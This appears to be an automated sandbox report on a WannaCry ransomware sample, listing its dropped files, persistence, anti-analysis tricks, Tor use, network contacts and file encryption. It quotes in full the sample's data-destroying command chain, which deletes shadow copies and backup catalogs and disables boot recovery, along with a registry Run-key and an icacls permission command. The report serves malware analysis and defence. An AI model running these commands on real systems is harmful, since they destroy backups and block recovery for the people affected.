Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: C:\ProgramData\ywepvofkuzu108\taskse.exeProcess created: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 'ywepvofkuzu108' /t REG_SZ /d '\'C:\ProgramData\ywepvofkuzu108\tasksche.exe\'' /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
Source: C:\ProgramData\ywepvofkuzu108\taskse.exeProcess created: unknown unknown
Uses an in-process (OLE) Automation serverShow sources
Source: C:\mssecsvc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
Contains functionality to launch a process as a different userShow sources
Source: C:\ProgramData\ywepvofkuzu108\taskse.exeCode function: 21_2_00401000 Sleep,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,AdjustTokenPrivileges,_local_unwind2,CreateProcessAsUserA,WaitForSingleObject,_local_unwind2,21_2_00401000
Creates files inside the system directoryShow sources
Source: C:\mssecsvc.exeFile created: C:\WINDOWS\tasksche.exe
Creates mutexesShow sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeMutant created: \BaseNamedObjects\MsWinZonesCacheCounterMutexA
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeMutant created: \BaseNamedObjects\Global\MsWinZonesCacheCounterMutexA0
Deletes Windows filesShow sources
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeFile deleted: C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus
Enables security privilegesShow sources
Source: C:\Windows\System32\wbengine.exeProcess token adjusted: Security
Found potential string decryption / allocating functionsShow sources
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeCode function: String function: 00316562 appears 35 times
PE file contains executable resources (Code or Archives)Show sources
Source: mssecsvc.exeStatic PE information: Resource name: R type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: tasksche.exe.3048.drStatic PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract
Source: tasksche.exe.3216.drStatic PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract
Reads the hosts fileShow sources
Source: C:\mssecsvc.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\mssecsvc.exeFile read: C:\Windows\System32\drivers\etc\hosts
Sample file is different than original file name gathered from version infoShow sources
Source: mssecsvc.exeBinary or memory string: OriginalFilenamewshtcpip.dll.muij% vs mssecsvc.exe
Source: mssecsvc.exeBinary or memory string: OriginalFilenamewship6.dll.muij% vs mssecsvc.exe
Source: mssecsvc.exeBinary or memory string: OriginalFilenamediskpart.exej% vs mssecsvc.exe
Source: mssecsvc.exeBinary or memory string: OriginalFilenamediskpart.exej% vs mssecsvc.exe
Source: mssecsvc.exeBinary or memory string: OriginalFilenamewshtcpip.dll.muij% vs mssecsvc.exe
Source: mssecsvc.exeBinary or memory string: OriginalFilenamewship6.dll.muij% vs mssecsvc.exe
Source: mssecsvc.exeBinary or memory string: OriginalFilenamediskpart.exej% vs mssecsvc.exe
Source: mssecsvc.exeBinary or memory string: OriginalFilenamelhdfrgui.exej% vs mssecsvc.exe
Uses reg.exe to modify the Windows registryShow sources
Source: unknownProcess created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 'ywepvofkuzu108' /t REG_SZ /d '\'C:\ProgramData\ywepvofkuzu108\tasksche.exe\'' /f
PE file contains more sections than normalShow sources
Source: libevent_core-2-0-5.dll.3408.drStatic PE information: Number of sections : 17 > 10
Source: libeay32.dll.3408.drStatic PE information: Number of sections : 18 > 10
Source: libevent-2-0-5.dll.3408.drStatic PE information: Number of sections : 17 > 10
Potential malicious VBS script found (suspicious strings)Show sources
Source: C:\Windows\System32\cmd.exeDropped file: SET ow = WScript.CreateObject("WScript.Shell")

HIPS / PFW / Operating System Protection Evasion:

barindex
Contains functionality to create a new security descriptorShow sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10001360 time,AllocateAndInitializeSid,time,CheckTokenMembership,FreeSid,5_2_10001360

Anti Debugging:

barindex
Contains functionality to register its own exception handlerShow sources
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeCode function: 19_2_001C11FD SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,exit,19_2_001C11FD
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\mssecsvc.exeSystem information queried: KernelDebuggerInformation
Contains functionality to dynamically determine API callsShow sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_100011D0 wcsrchr,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,GlobalAlloc,GetTokenInformation,LoadLibraryA,GetProcAddress,wcscpy,GlobalFree,5_2_100011D0
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Windows\tasksche.exeCode function: 3_2_004029CC free,GetProcessHeap,HeapFree,3_2_004029CC

Malware Analysis System Evasion:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10002300 CloseHandle,SHGetFolderPathW,??2@YAPAXI@Z,swprintf,FindFirstFileW,??3@YAXPAX@Z,??3@YAXPAX@Z,wcscmp,wcscmp,wcscmp,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcscmp,wcscmp,wcscmp,wcsncpy,wcsncpy,wcsncpy,FindNextFileW,FindClose,_wcsnicmp,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,5_2_10002300
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10004A40 CloseHandle,SHGetFolderPathW,wcslen,SHGetFolderPathW,SHGetFolderPathW,wcslen,wcsrchr,wcschr,SHGetFolderPathW,wcslen,wcsrchr,swprintf,FindFirstFileW,wcscmp,wcscmp,swprintf,wcscmp,swprintf,FindNextFileW,FindClose,5_2_10004A40
Source: C:\ProgramData\ywepvofkuzu108\taskdl.exeCode function: 10_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,10_2_00401080
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,14_2_004080C0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,14_2_004026B0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,14_2_00403CB0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 18_1_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,18_1_004080C0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 18_1_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,swprintf,#825,#825,18_1_004026B0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 18_1_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,18_1_00403CB0
Source: C:\ProgramData\ywepvofkuzu108\taskdl.exeCode function: 23_1_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,23_1_00401080
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: taskhsvc.exeBinary or memory string: 9bdnPNObPosMJgjNTFNQ7GrneqcJovXdxnKaDfQMDU2QMnaVIpZWJmCVmciOUzku
Source: taskhsvc.exeBinary or memory string: ntor-onion-key 98xF42/leL0gt7INkbMlQemUc3uYYiQzK1dmPR0afWA=
Source: taskhsvc.exeBinary or memory string: r385m+l2iI6U+RBB9ZGf2qEmUhX1m22Ub04mANu8v5MhjaK9Cr/9AgMBAAE=
Source: taskhsvc.exeBinary or memory string: id ed25519 vA9zbcE+2YhiQRkUAt5LvMCijbpUW4Op15qrMlKqy+s
Source: taskhsvc.exeBinary or memory string: ntor-onion-key cs1j8xs837ZvQVZiX90H7gHk20kQeMUz/RYOKuTJRHs=
Queries a list of all running processesShow sources
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeProcess information queried: ProcessInformation
Checks the free space of harddrivesShow sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile Volume queried: C:\ FullSizeInformation
Contains long sleeps (>= 3 min)Show sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeThread delayed: delay time: -1000
Enumerates the file systemShow sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile opened: C:\Users\All Users\Adobe\Acrobat\11.0\~SD874C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile opened: C:\Users\All Users\Adobe\Acrobat\~SD874B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile opened: C:\Users\All Users\~SD8739.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile opened: C:\Users\All Users\Adobe\Acrobat\11.0\Replicate\Security\~SD874E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile opened: C:\Users\All Users\Adobe\Acrobat\11.0\Replicate\~SD874D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile opened: C:\Users\All Users\Adobe\~SD874A.tmp
Found dropped PE file which has not been started or loadedShow sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeDropped PE file which has not been started: C:\Users\Default\Desktop\@WanaDecryptor@.exe
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeDropped PE file which has not been started: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libevent_core-2-0-5.dll
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeDropped PE file which has not been started: C:\Users\Public\Desktop\@WanaDecryptor@.exe
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeDropped PE file which has not been started: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libevent_extra-2-0-5.dll
Found large amount of non-executed APIsShow sources
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeAPI coverage: 7.6 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\mssecsvc.exe TID: 3092Thread sleep time: -60000s >= -60s
Source: C:\mssecsvc.exe TID: 3200Thread sleep time: -60000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3244Thread sleep time: -500s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3300Thread sleep count: 158 > 30
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3300Thread sleep time: -158000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3312Thread sleep count: 31 > 30
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3312Thread sleep time: -93000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3304Thread sleep time: -95000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3244Thread sleep count: 77 > 30
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3244Thread sleep time: -770s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3328Thread sleep time: -180000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3244Thread sleep time: -30000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3312Thread sleep time: -3000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3304Thread sleep time: -5000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3328Thread sleep time: -30000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3316Thread sleep time: -30000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe TID: 3460Thread sleep time: -10000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\taskse.exe TID: 3520Thread sleep time: -200s >= -60s
Source: C:\Windows\System32\vssadmin.exe TID: 3684Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wbem\WMIC.exe TID: 3796Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wbadmin.exe TID: 3868Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wbengine.exe TID: 3916Thread sleep time: -60000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\taskse.exe TID: 3912Thread sleep time: -200s >= -60s
Source: C:\Windows\System32\vdsldr.exe TID: 3932Thread sleep time: -1000s >= -60s
Source: C:\Windows\System32\vdsldr.exe TID: 3968Thread sleep time: -60000s >= -60s
Found evasive API chain (may stop execution after checking mutex)Show sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_5-1483

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\mssecsvc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\ywepvofkuzu108\taskse.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\ywepvofkuzu108\taskse.exeProcess information set: NOOPENFILEERRORBOX
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_004067F0 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,14_2_004067F0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 18_1_004067F0 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,18_1_004067F0
Extensive use of GetProcAddress (often used to hide API calls)Show sources
Source: C:\ProgramData\ywepvofkuzu108\taskse.exeCode function: 21_2_00401000 Sleep,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,AdjustTokenPrivileges,_local_unwind2,CreateProcessAsUserA,WaitForSingleObject,_local_unwind2,21_2_00401000
Creates files inside the volume driver (system volume information)Show sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\System Volume Information\~SD8733.tmp
May use the Tor software to hide its network trafficShow sources
Source: taskhsvc.exeBinary or memory string: onion-port
Uses cacls to modify the permissions of filesShow sources
Source: unknownProcess created: C:\Windows\System32\icacls.exe icacls . /grant Everyone:F /T /C /Q

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Overwrites Mozilla Firefox settingsShow sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\revocations.txt.WNCRYT
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.db.WNCRYT
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\key3.db.WNCRYT
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js.WNCRYT
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\secmod.db.WNCRYT
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore.js.WNCRYT
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\previous.js.WNCRYT
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert_override.txt.WNCRYT
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\SiteSecurityServiceState.txt.WNCRYT

Language, Device and Operating System Detection:

barindex
Contains functionality to query local / system timeShow sources
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeCode function: 19_2_0032FC04 GetSystemTimeAsFileTime,exit,__stack_chk_fail,19_2_0032FC04
Contains functionality to query the account / user nameShow sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10004F20 swprintf,swprintf,MultiByteToWideChar,CopyFileW,CopyFileW,GetUserNameW,_wcsicmp,SystemParametersInfoW,swprintf,CopyFileW,5_2_10004F20
Contains functionality to query time zone informationShow sources
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_00406F80 SendMessageA,CreateSolidBrush,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateFontA,CreateFontA,#1641,CreateFontA,#1641,CreateFontA,#1641,#3092,SendMessageA,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#860,#537,#537,#540,#2818,#535,#2818,#535,SendMessageA,SendMessageA,#6140,#6140,GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,SystemTimeToTzSpecificLocalTime,#2818,SystemTimeToTzSpecificLocalTime,#2818,#6334,#800,14_2_00406F80
Queries the cryptographic machine GUIDShow sources
Source: C:\mssecsvc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Contains functionality locales information (e.g. system language)Show sources
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: SendMessageA,GetUserDefaultLangID,GetLocaleInfoA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,14_2_00406C20
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: SendMessageA,GetUserDefaultLangID,GetLocaleInfoA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,18_1_00406C20
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cscript.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cscript.exeQueries volume information: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe VolumeInformation

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behavior_graph main Behavior Graph ID: 269081 Sample:  mssecsvc.exe Startdate:  12/05/2017 Architecture:  WINDOWS Score:  100 0reduced Processes exeeded maximum capacity for this level. 2 processes have been hidden. main->0reduced      started     0 mssecsvc.exe 7 main->0      started     2 mssecsvc.exe 6 main->2      started     4 cmd.exe main->4      started     8094reducedSig Signatures exceeded maximum capacity for this level. 4 signatures have been hidden. 3860sig Drops executables to the windows directory (C:\Windows) and starts them 3862sig Drops executables to the windows directory (C:\Windows) and starts them 8094sig Command shell drops VBS files 725reducedSig Signatures exceeded maximum capacity for this level. 3 signatures have been hidden. 725sig Contains functionalty to change the wallpaper 915sig Creates files inside the volume driver (system volume information) 5235sig Drops files with a non-matching file extension (content does not match file extension) 80911reducedSig Signatures exceeded maximum capacity for this level. 4 signatures have been hidden. 7214reducedSig Signatures exceeded maximum capacity for this level. 2 signatures have been hidden. 80915reducedSig Signatures exceeded maximum capacity for this level. 4 signatures have been hidden. 80922reducedSig Signatures exceeded maximum capacity for this level. 4 signatures have been hidden. 80911sig Command shell drops VBS files 7214sig Contains functionalty to change the wallpaper 80915sig Command shell drops VBS files 80922sig Command shell drops VBS files 7218reducedSig Signatures exceeded maximum capacity for this level. 2 signatures have been hidden. 7225reducedSig Signatures exceeded maximum capacity for this level. 2 signatures have been hidden. 77719sig Creates files in the system32 config directory 522d1e544778sig Detected TCP or UDP traffic on non-standard ports 522d1e544780sig Detected TCP or UDP traffic on non-standard ports 522d1e544784sig Detected TCP or UDP traffic on non-standard ports 7218sig Contains functionalty to change the wallpaper 7225sig Contains functionalty to change the wallpaper 80927reducedSig Signatures exceeded maximum capacity for this level. 2 signatures have been hidden. 80927sig Command shell drops VBS files 53227sig Deletes shadow drive data (may be related to ransomware) 86427sig May disable shadow drive data (uses vssadmin) d1e544783 www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 144.217.74.156, 80 UniversityofNebraskaCentralAdministration United States d1e478394 www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com d1e478453 www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com d1e544777reduced Connected ips exeeded maximum capacity for this level. 3 connected ips have been hidden. d1e544778 195.154.107.23, 993 ONLINESAS France d1e544778->522d1e544778sig d1e544780 79.137.85.71, 9001 E4Asrl Italy d1e544780->522d1e544780sig d1e544784 138.68.0.4, 9090 OrbitalSciencesCorporation United States d1e544784->522d1e544784sig d1e175133reduced Dropped files exeeded maximum capacity for this level. 5 dropped files have been hidden. d1e76155 tasksche.exe, PE32 d1e175133 taskdl.exe, PE32 d1e175159 taskse.exe, PE32 d1e545486reduced Dropped files exeeded maximum 